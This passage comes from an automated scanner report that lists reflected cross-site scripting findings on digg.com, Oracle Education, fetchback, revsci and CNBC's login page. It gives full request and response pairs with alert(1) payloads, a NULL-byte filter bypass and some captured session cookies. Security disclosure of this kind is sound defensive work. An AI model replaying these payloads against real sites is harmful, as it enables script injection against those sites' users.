HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1ea7ed1-4fbc-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Date: Tue, 06 Sep 2011 15:16:00 GMT
Content-Length: 1895
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9">
...[SNIP]...

3.30. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003355b"><script>alert(1)</script>0a3916a9e29 was submitted in the REST URL parameter 1. This input was echoed as 3355b"><script>alert(1)</script>0a3916a9e29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%003355b"><script>alert(1)</script>0a3916a9e29 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19408553 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14406

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003355b"><script>alert(1)</script>0a3916a9e29.rss">
...[SNIP]...

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getCourseDesc

Issue detail

The value of the dc request parameter is copied into an HTML comment. The payload 2e67c--><a%20b%3dc>c97d7ad58db was submitted in the dc parameter. This input was echoed as 2e67c--><a b=c>c97d7ad58db in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pls/web_prod-plq-dad/db_pages.getCourseDesc?dc=D70302_13531452e67c--><a%20b%3dc>c97d7ad58db HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819943764065,1)
Content-Length: 3769
Date: Tue, 06 Sep 2011 15:55:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<!-- No course found for id D70302_13531452e67c--><a b=c>c97d7ad58db -->
...[SNIP]...

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56fe7"%3balert(1)//452b678fc04 was submitted in the p_lang parameter. This input was echoed as 56fe7";alert(1)//452b678fc04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=&p_org_id=&p_lang=56fe7"%3balert(1)//452b678fc04 HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057828533965601,0)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7";alert(1)//452b678fc04&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&cust_region=&cust_
...[SNIP]...

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_wddi_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d8a"%3balert(1)//25f551d98f2 was submitted in the p_wddi_id parameter. This input was echoed as e4d8a";alert(1)//25f551d98f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=e4d8a"%3balert(1)//25f551d98f2&p_org_id=&p_lang= HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057875778605369,1)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=e4d8a";alert(1)//25f551d98f2&p_org_id=&p_lang=&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&
...[SNIP]...

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ec"><script>alert(1)</script>4d22a5b224d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=USd40ec"><script>alert(1)</script>4d22a5b224d HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057776994499472,1)
Content-Length: 950
Date: Tue, 06 Sep 2011 16:01:50 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
USd40ec"><script>alert(1)</script>4d22a5b224d
_rd_temp_config.js">
...[SNIP]...

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4202e"%3balert(1)//231562bd186 was submitted in the lang parameter. This input was echoed as 4202e";alert(1)//231562bd186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=US4202e"%3balert(1)//231562bd186 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057768404565213,0)
Content-Length: 920
Date: Tue, 06 Sep 2011 16:01:51 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "US4202e";alert(1)//231562bd186"</SCRIPT>
...[SNIP]...

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/show_desc.redirect

Issue detail

The value of the p_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6e2"><script>alert(1)</script>818bc7ecf2f was submitted in the p_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2"><script>alert(1)</script>818bc7ecf2f HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057845713838882,1)
Content-Length: 1022
Date: Tue, 06 Sep 2011 15:59:36 GMT

<HTML>
<HEAD>
<TITLE>Catalog Search Results</TITLE>
<SCRIPT language=JavaScript>document.domain="oracle.com"</SCRIPT>
<SCRIPT language=JavaScript>var site_section = "Search"</SCRIPT>
<script language=
...[SNIP]...
<FRAME SRC="
/pls/web_prod-plq-dad
/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2"><script>alert(1)</script>818bc7ecf2f
" NAME="content" MARGINWIDTH=5 MARGINHEIGHT=0 SCROLLING=AUTO>
...[SNIP]...

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f6e"><script>alert(1)</script>33d02dcf400 was submitted in the p_lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e262f6e"><script>alert(1)</script>33d02dcf400 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 19101
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=200136460310,1)
Date: Tue, 06 Sep 2011 16:02:10 GMT

<!--*09:02:10*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
UScd6e262f6e"><script>alert(1)</script>33d02dcf400
_rd_temp_config.js">
...[SNIP]...

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76780"%3balert(1)//43d7466ae8e was submitted in the p_lang parameter. This input was echoed as 76780";alert(1)//43d7466ae8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780"%3balert(1)//43d7466ae8e HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 18996
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=216172922120704642,1)
Date: Tue, 06 Sep 2011 16:02:12 GMT

<!--*09:02:12*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "UScd6e276780";alert(1)//43d7466ae8e"</SCRIPT>
...[SNIP]...

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b161b"-alert(1)-"550e756bc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:23 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321223_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:23 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:23 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 235

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3925"-alert(1)-"281d83ef8c3 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321222_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:22 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 232

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.41. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ae529<script>alert(1)</script>55e88475fb6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F09828ae529<script>alert(1)</script>55e88475fb6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 16:45:35 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 07 Sep 2011 16:45:35 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F09828AE529<SCRIPT>ALERT(1)</SCRIPT>55E88475FB6" was not recognized.
*/

3.42. https://login.cnbc.com/cas/login [apphome parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the apphome request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5c0"><script>alert(1)</script>0f8cf36ce47 was submitted in the apphome parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:10 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
rm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription">
...[SNIP]...

3.43. https://login.cnbc.com/cas/login [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9cd"><script>alert(1)</script>792007f2f0 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
